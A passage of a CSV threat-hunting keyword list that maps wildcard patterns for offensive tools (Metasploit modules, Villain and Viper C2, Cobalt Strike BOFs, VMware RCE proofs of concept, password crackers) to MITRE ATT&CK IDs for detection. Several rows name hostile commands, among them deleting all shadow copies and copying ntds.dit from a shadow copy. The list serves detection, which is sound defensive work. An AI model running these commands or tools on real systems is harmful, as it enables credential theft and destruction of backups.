,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*veeam_credential_dump.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*veeam_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Vegile -*,offensive_tool_keyword,BruteSploit,Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. 
There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Vegile,1,0,N/A,N/A,7,686,175,2022-09-01T01:54:35Z,2018-01-02T05:29:48Z -*venv wapiti3*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*Verified Merlin server *,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*verovaleros/domain_analyzer*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,1,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*victim_host_generator.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*VID_03EB&PID_2403 *,offensive_tool_keyword,ducky,rubber ducky,T1021 - T1056.001 - T1060 - T1573 - T1573.002,TA0002 - TA0007 - TA0044,N/A,N/A,Hardware,https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki,1,0,default vid and pid of the device - risk of false positives,10,1,2,0,2015-03-15T02:45:33Z,2015-03-15T02:45:31Z -*VID_0483&PID_5740*,offensive_tool_keyword,FlipperZero,Flipper ZeroFlipper Zero is a portable multi-tool for pentesters and geeks in a 
toy-like body,T1021 - T1056.001 - T1060 - T1573 - T1573.002,TA0002 - TA0007 - TA0044,N/A,N/A,Hardware,https://docs.flipper.net/qflipper/windows-debug,1,0,default vid and pid of the device - risk of false positives,10,10,N/A,N/A,N/A,N/A -*viewdns-get-rootdomains-ip-ns *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*viewdns-get-rootdomains-whois *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*Villain.git*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*villain.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*Villain/Core*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. 
enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*villain_core.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*vincent.letoux@gmail.com*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*viper/*.sock*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*viper-dev.conf*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*viperpython-dev*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*viperpython-main*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*viperzip.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*virajkulkarni14*,offensive_tool_keyword,Github Username,github repo username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/virajkulkarni14,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Viralmaniar*,offensive_tool_keyword,Github Username,github username hosting post exploitation tools and recon tools,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Viralmaniar,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*VirTool:Win32/RemoteExec*,signature_keyword,Antivirus Signature,AV signature often associated with C2 communications (cobaltstrike for example),N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*virusscan_bypass.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*VirusTotalC2.*,offensive_tool_keyword,VirusTotalC2,Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. 
now you have a free one,T1071.004 - T1102 - T1021.002,TA0011 - TA0008 - TA0042,N/A,N/A,C2,https://github.com/RATandC2/VirusTotalC2,1,1,N/A,10,10,5,81,2022-09-28T15:10:44Z,2022-09-28T15:12:42Z -*Visual-Studio-BOF-template*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*VITE_STRIKER_API*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*vivaldi* --headless * --dump-dom http*,greyware_tool_keyword,chromium,Headless Chromium allows 
running Chromium in a headless/server environment - downloading a file - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense Evasion,https://redcanary.com/blog/intelligence-insights-june-2023/,1,0,N/A,4,5,N/A,N/A,N/A,N/A -"*vivaldi.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",greyware_tool_keyword,chromium,The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.,T1136.001 - T1176 - T1059.007,TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://www.mandiant.com/resources/blog/lnk-between-browsers,1,0,risk of false positives,7,10,N/A,N/A,N/A,N/A -*VMSA-2023-0001.py*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,1,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -*vmware_view_planner*uploadlog_rce*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vmware_vrni_rce_cve_2023_20887.rb*,offensive_tool_keyword,POC,VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887),T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002,TA0005 - TA0002 - TA0001 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sinsinology/CVE-2023-20887,1,1,N/A,N/A,3,219,44,2023-06-13T14:39:17Z,2023-06-13T13:17:23Z -*vmware_workspace_one_access_cve_*.rb,offensive_tool_keyword,POC,POC for VMWARE CVE-2022-22954,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb,1,1,N/A,N/A,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*VMware-vRealize-Log-Insight.cert*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation 
Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,1,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -*vmx2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*vnc_password_osx.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vnc_passwords.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vncdumpdll*,offensive_tool_keyword,vncpwdump,vnc password sniffer,T1003.003 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://www.codebus.net/d-2v0u.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*vncinject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*vncpcap2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*vncpwdump.*,offensive_tool_keyword,vncpwdump,vnc password sniffer,T1003.003 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://www.codebus.net/d-2v0u.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*vncviewer *.*:5901*,greyware_tool_keyword,vncviewer,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Network Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*vnperistence.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*volatility2 --profile=*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*volatility3 -f *.dmp*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*VPNPivot*,offensive_tool_keyword,VPNPivot,Sometime we do external penetration testing and when we compromise the remote target we would like to explore the internal network behind and getting such compromise like owning Active directory. accessing shared files. conducting MITM attacks ... 
etc,T1090 - T1095 - T1562 - T1201 - T1558,TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/0x36/VPNPivot,1,1,N/A,N/A,3,256,52,2016-07-21T08:49:26Z,2015-08-26T18:44:42Z -*vRealizeLogInsightRCE*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,1,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -*vsf_sysutil_read_loop*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,1,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*vssadmin create shadow /for=C:*,greyware_tool_keyword,vssadmin,the command is used to create a new Volume Shadow Copy for a specific volume which can be utilized by an attacker to collect data from the local system,T1005,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*vssadmin create shadow /for=C:* \Temp\*.tmp*,greyware_tool_keyword,vssadmin,the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.,T1003.001 - T1567.001 - T1070.004,TA0005 - TA0003 - TA0007,N/A,Volt Typhoon,Credential 
Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*vssadmin list shadows*,greyware_tool_keyword,vssadmin,List shadow copies using vssadmin,T1059.003 - T1059.001 - T1005,TA0002 - TA0005 - TA0010,N/A,N/A,discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*vssadmin* Delete Shadows /All /Quiet*,greyware_tool_keyword,vssadmin,Deletes all Volume Shadow Copies from the system quietly (without prompts).,T1490,TA0040,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*vssenum.x64.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*vssenum.x86.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 